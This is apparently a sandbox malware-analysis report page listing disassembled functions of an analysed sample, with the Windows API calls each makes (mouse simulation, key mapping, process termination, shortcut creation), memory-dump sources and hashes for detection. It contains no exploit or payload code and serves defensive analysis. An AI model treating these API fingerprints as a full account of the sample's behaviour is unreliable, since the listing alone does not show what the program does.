                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5c8f325f75a23add803b99aede15118f698ccd656a787ec53f65a6558e1463a5
                                                                                                                                                                                                                                                                  • Instruction ID: 8c5929ad2de4501ac16fdf3f998cde0363fb23175f36be34225e1027f2008de5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c8f325f75a23add803b99aede15118f698ccd656a787ec53f65a6558e1463a5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A418130642344EFDB26DF24C88DBA57BF1FB45314F1881A9E50D9B2A2EB31A845DB70
                                                                                                                                                                                                                                                                  Function 00D62D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 00D62D45
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5EF33: GetWindowRect.USER32(?,?), ref: 00D5EF4B
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D62D6F
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00D62D76
                                                                                                                                                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00D62DB2
                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00D62DDE
                                                                                                                                                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00D62E3C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                  • Opcode ID: af79098fe99279ed6f865e3747c26a4d2c118404826223fd08c2fed86852786a
                                                                                                                                                                                                                                                                  • Instruction ID: a500abfa6775cc79971c1f4c7d8b550ff5ff03d340048b951bb08b3acb50a017
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af79098fe99279ed6f865e3747c26a4d2c118404826223fd08c2fed86852786a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8531EF72605716ABC720DF148845FAAB7AAFFC4314F040919F889E7291DB30E9488BF2
                                                                                                                                                                                                                                                                  Function 00D455E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00D455F9
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D45616
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D4564E
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4566C
                                                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00D45674
                                                                                                                                                                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00D4567E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 72514467-0
                                                                                                                                                                                                                                                                  • Opcode ID: 393b9e75afac943bd6fa3fc11889bb7972e6396232a2e82366b6c07e28858825
                                                                                                                                                                                                                                                                  • Instruction ID: 8a70f32765d7b8602b71586c5c4c746d1aad4ec5352b50733f58beee30238348
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 393b9e75afac943bd6fa3fc11889bb7972e6396232a2e82366b6c07e28858825
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD2135322046047BEB156B39EC49F7F7BADDF45720F198029F80ACA196EB61CC418770
                                                                                                                                                                                                                                                                  Function 00D56263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CE55D1,?,?,00D24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00CE5871
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D562C0
                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00D563DA
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00D80CC4,00000000,00000001,00D80B34,?), ref: 00D563F3
                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00D56411
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                                                                                                                  • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                  • Opcode ID: f3f623d64d3131689ba49d409b87eedf8176974058b25aa7f6f1ac1003b1f695
                                                                                                                                                                                                                                                                  • Instruction ID: d1272a9ec0edf1eb5179ebf4be17bf019b1df8862b203ccbad6cbb939cb8b8db
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3f623d64d3131689ba49d409b87eedf8176974058b25aa7f6f1ac1003b1f695
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67D13475A043019FCB14DF25C48092ABBE5FF89715F58885CF8899B361DB31EC49CBA2
                                                                                                                                                                                                                                                                  Function 00D786FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D78740
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00D78765
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00D7877D
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00D787A6
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00D5C1F2,00000000), ref: 00D787C6
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00D787B1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                  • Opcode ID: bb2f94bbf426f6702ef6a9fd4702e0112f69d25fa85ff9e75276f95582e5386d
                                                                                                                                                                                                                                                                  • Instruction ID: cd1f5a81749efca14906c33f8474f305623abb80a388d7647900588e0f931a31
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb2f94bbf426f6702ef6a9fd4702e0112f69d25fa85ff9e75276f95582e5386d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67218371650345DFCB185F39CC48A6A3BA6EF45325F248629F96BC32E0FA308850DB30
                                                                                                                                                                                                                                                                  Function 00D036F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00D036E9,00D03355), ref: 00D03700
                                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D0370E
                                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D03727
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00D036E9,00D03355), ref: 00D03779
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                  • Opcode ID: 48cc1e46d11ab86e1d6cf4bd16157f2b8b6a50a7a620db9dd354cc8bdc179b98
                                                                                                                                                                                                                                                                  • Instruction ID: aa1a6a99189c85a1e5a339956b2f630bab90cf1cb4dce874f12a22ece420e8f7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48cc1e46d11ab86e1d6cf4bd16157f2b8b6a50a7a620db9dd354cc8bdc179b98
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A20124B264E3112EE62427B8BCC67673A9DEB467727200329F21C802F0FF528D025275
                                                                                                                                                                                                                                                                  Function 00D130E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00D04D53,00000000,?,?,00D068E2,?,?,00000000), ref: 00D130EB
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1311E
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13146
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 00D13153
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 00D1315F
                                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 00D13165
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                  • Opcode ID: b90ab31b02c659eac67b5975dc8ecc224e4ff9569136d0b6101bdf4dbd27453c
                                                                                                                                                                                                                                                                  • Instruction ID: 99f4670c8e248089985d158d7dae12b29eed90d2ebf79749b545e61fc1d2ccc5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b90ab31b02c659eac67b5975dc8ecc224e4ff9569136d0b6101bdf4dbd27453c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58F0447654470076D6122735FC07AEA266BDFC2771B254518F92DD23D1EE258AC241B1
                                                                                                                                                                                                                                                                  Function 00D79480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00CE1F87
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: SelectObject.GDI32(?,00000000), ref: 00CE1F96
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: BeginPath.GDI32(?), ref: 00CE1FAD
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: SelectObject.GDI32(?,00000000), ref: 00CE1FD6
                                                                                                                                                                                                                                                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00D794AA
                                                                                                                                                                                                                                                                  • LineTo.GDI32(?,00000003,00000000), ref: 00D794BE
                                                                                                                                                                                                                                                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00D794CC
                                                                                                                                                                                                                                                                  • LineTo.GDI32(?,00000000,00000003), ref: 00D794DC
                                                                                                                                                                                                                                                                  • EndPath.GDI32(?), ref: 00D794EC
                                                                                                                                                                                                                                                                  • StrokePath.GDI32(?), ref: 00D794FC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 43455801-0
                                                                                                                                                                                                                                                                  • Opcode ID: 796fd3ae6dc13a9b6c19f88a221f4140b804c22be58a5a42f1d2e58defa15a44
                                                                                                                                                                                                                                                                  • Instruction ID: 04e549903aa6029245a304f476acc14262f76d116e78b8c2646670ff2b055429
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 796fd3ae6dc13a9b6c19f88a221f4140b804c22be58a5a42f1d2e58defa15a44
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE110C72000209FFDF029F90DC88EAA7F6DEF08364F04C115BA1985261D7719D95DBB0
                                                                                                                                                                                                                                                                  Function 00D45B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00D45B7C
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D45B8D
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D45B94
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00D45B9C
                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00D45BB3
                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00D45BC5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                  • Opcode ID: 678a0828faf4e6e3452ac2b17c94cfbb57b63c4fa431527b20f29664eaa4e295
                                                                                                                                                                                                                                                                  • Instruction ID: 1e73f02a63776f79d8e8c952e9cbdb94db2feba6aebcbd33c971b9ce790db378
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 678a0828faf4e6e3452ac2b17c94cfbb57b63c4fa431527b20f29664eaa4e295
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44012C75A00718BBEB11ABA59C49F4EBFB9EF48751F144065FA09E7281E6709800CFA0
                                                                                                                                                                                                                                                                  Function 00CE327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00CE32AF
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00CE32B7
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00CE32C2
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00CE32CD
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00CE32D5
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CE32DD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Virtual
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                  • Opcode ID: 87706fbef26ed12e081c986a6db4616d0639e364ac2f9b02a1b27a91e044e9ea
                                                                                                                                                                                                                                                                  • Instruction ID: f91c8fe584270b5b90cebefe772a3c3c5f64088a1581b98b69eebb63845fa70c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87706fbef26ed12e081c986a6db4616d0639e364ac2f9b02a1b27a91e044e9ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8016CB09017597DE3009F5A8C85B56FFB8FF19354F00411B915C47A41C7F5A864CBE5
                                                                                                                                                                                                                                                                  Function 00D4F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D4F447
                                                                                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00D4F45D
                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00D4F46C
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D4F47B
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D4F485
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D4F48C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                                                                                                                                                  • Opcode ID: f0757a216e13ef72b100032387cb356a50cae4a1f6fa4d1e44c1d981d002945a
                                                                                                                                                                                                                                                                  • Instruction ID: 0ff261488b2dcced23205e5bff213cb3ffd50b77f0ccd44240cea4b9fbf0488c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0757a216e13ef72b100032387cb356a50cae4a1f6fa4d1e44c1d981d002945a
